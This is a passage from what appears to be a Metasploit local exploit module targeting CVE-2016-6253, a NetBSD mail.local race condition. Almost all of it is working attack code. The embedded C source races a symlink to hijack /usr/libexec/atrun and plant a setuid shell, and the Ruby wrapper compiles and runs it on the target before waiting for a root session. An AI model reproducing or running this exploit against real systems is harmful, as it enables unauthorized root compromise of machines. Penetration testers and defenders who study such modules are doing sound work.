'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic openssl'
}
},
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 603 }, #can take 10min for cron to kick
'References' =>
[
[ "URL", "http://akat1.pl/?id=2"],
[ "EDB", "40141"],
[ "CVE", "2016-6253"],
[ "URL", "http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.asc"]
]
))
register_options([
OptString.new('ATRUNPATH', [true, 'Location of atrun binary', '/usr/libexec/atrun']),
OptString.new('MAILDIR', [true, 'Location of mailboxes', '/var/mail']),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 603])
], self.class)
end
def exploit
# lots of this file's format is based on pkexec.rb
# direct copy of code from exploit-db
main = %q{
// Source: http://akat1.pl/?id=2
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <stdlib.h>
#include <string.h>
#include <err.h>
#include <sys/wait.h>
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0)
out = fopen(dest, "wb");
else {
fd = open(dest, O_WRONLY | O_EXCL | O_CREAT, S_IRUSR | S_IWUSR);
if (fd == -1) {
rv = -1;
goto out;
}
out = fdopen(fd, "wb");
}
if (in == NULL || out == NULL) {
rv = -1;
goto out;
}
while ((size = fread(&buf, 1, sizeof(buf), in)) > 0) {
if (fwrite(&buf, 1, size, in) != 0) {
rv = -1;
goto out;
}
}
out:
if (in != NULL && fclose(in) != 0)
rv = -1;
if (out != NULL && fclose(out) != 0)
rv = -1;
return rv;
}
int
main()
{
pid_t pid;
uid_t uid;
struct stat sb;
char *login, *mailbox, *mailbox_backup = NULL, *atrun_backup, *buf;
umask(0077);
login = getlogin();
if (login == NULL)
err(EXIT_FAILURE, "who are you?");
uid = getuid();
asprintf(&mailbox, MAILDIR "/%s", login);
if (mailbox == NULL)
err(EXIT_FAILURE, NULL);
if (access(mailbox, F_OK) != -1) {
/* backup mailbox */
asprintf(&mailbox_backup, "/tmp/%s", login);
if (mailbox_backup == NULL)
err(EXIT_FAILURE, NULL);
}
if (mailbox_backup != NULL) {
fprintf(stderr, "[+] backup mailbox %s to %s\n", mailbox, mailbox_backup);
if (copy_file(mailbox, mailbox_backup, 1))
err(EXIT_FAILURE, "[-] failed");
}
/* backup atrun(1) */
atrun_backup = strdup("/tmp/atrun");
if (atrun_backup == NULL)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] backup atrun(1) %s to %s\n", ATRUNPATH, atrun_backup);
if (copy_file(ATRUNPATH, atrun_backup, 1))
err(EXIT_FAILURE, "[-] failed");
/* win the race */
fprintf(stderr, "[+] try to steal %s file\n", ATRUNPATH);
switch (pid = fork()) {
case -1:
err(EXIT_FAILURE, NULL);
/* NOTREACHED */
case 0:
asprintf(&buf, "echo x | /usr/libexec/mail.local -f xxx %s "
"2> /dev/null", login);
for(;;)
system(buf);
/* NOTREACHED */
default:
umask(0022);
for(;;) {
int fd;
unlink(mailbox);
symlink(ATRUNPATH, mailbox);
sync();
unlink(mailbox);
fd = open(mailbox, O_CREAT, S_IRUSR | S_IWUSR);
close(fd);
sync();
if (lstat(ATRUNPATH, &sb) == 0) {
if (sb.st_uid == uid) {
kill(pid, 9);
fprintf(stderr, "[+] won race!\n");
break;
}
}
}
break;
}
(void)waitpid(pid, NULL, 0);
if (mailbox_backup != NULL) {
/* restore mailbox */
fprintf(stderr, "[+] restore mailbox %s to %s\n", mailbox_backup, mailbox);
if (copy_file(mailbox_backup, mailbox, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(mailbox_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
}
/* overwrite atrun */
fprintf(stderr, "[+] overwriting atrun(1)\n");
if (chmod(ATRUNPATH, 0755) != 0)
err(EXIT_FAILURE, NULL);
if (overwrite_atrun())
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] waiting for atrun(1) execution...\n");
for(;;sleep(1)) {
if (access("/tmp/ksh", F_OK) != -1)
break;
}
/* restore atrun */
fprintf(stderr, "[+] restore atrun(1) %s to %s\n", atrun_backup, ATRUNPATH);
if (copy_file(atrun_backup, ATRUNPATH, 0))
err(EXIT_FAILURE, "[-] failed");
if (unlink(atrun_backup) != 0)
err(EXIT_FAILURE, "[-] failed");
if (chmod(ATRUNPATH, 0555) != 0)
err(EXIT_FAILURE, NULL);
fprintf(stderr, "[+] done! Don't forget to change atrun(1) "
"ownership.\n");
fprintf(stderr, "Enjoy your shell:\n");
execl("/tmp/ksh", "ksh", NULL);
return 0;
}
}
# patch in our variable maildir and atrunpath
main.gsub!(/#define ATRUNPATH "\/usr\/libexec\/atrun"/,
"#define ATRUNPATH \"#{datastore["ATRUNPATH"]}\"")
main.gsub!(/#define MAILDIR "\/var\/mail"/,
"#define MAILDIR \"#{datastore["MAILDIR"]}\"")
executable_path = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}"
payload_file = "#{rand_text_alpha(8)}"
payload_path = "#{datastore["WritableDir"]}/#{payload_file}"
vprint_status("Writing Payload to #{payload_path}")
# patch in to run our payload as part of ksh
main.gsub!(/execl\("\/tmp\/ksh", "ksh", NULL\);/,
"execl(\"/tmp/ksh\", \"ksh\", \"#{payload_path}\", NULL);")
write_file(payload_path, payload.encoded)
cmd_exec("chmod 555 #{payload_path}")
register_file_for_cleanup(payload_path)
print_status "Writing exploit to #{executable_path}.c"
# clean previous bad attempts to prevent c code from exiting
rm_f executable_path
rm_f '/tmp/atrun'
whoami = cmd_exec('whoami')
rm_f "/tmp/#{whoami}"
write_file("#{executable_path}.c", main)
print_status("Compiling #{executable_path}.c via gcc")
output = cmd_exec("/usr/bin/gcc -o #{executable_path}.out #{executable_path}.c")
output.each_line { |line| vprint_status(line.chomp) }
print_status('Starting the payload handler...')
handler({})
print_status("Executing at #{Time.now}. May take up to 10min for callback")
output = cmd_exec("chmod +x #{executable_path}.out; #{executable_path}.out")
output.each_line { |line| vprint_status(line.chomp) }
# our sleep timer
stime = Time.now.to_f
until session_created? || stime + datastore['ListenerTimeout'] < Time.now.to_f
Rex.sleep(1)
end
print_status("#{Time.now}")
register_file_for_cleanup(executable_path)
register_file_for_cleanup("#{executable_path}.out")
print_status("Remember to run: chown root:wheel #{datastore["ATRUNPATH"]}")
end
end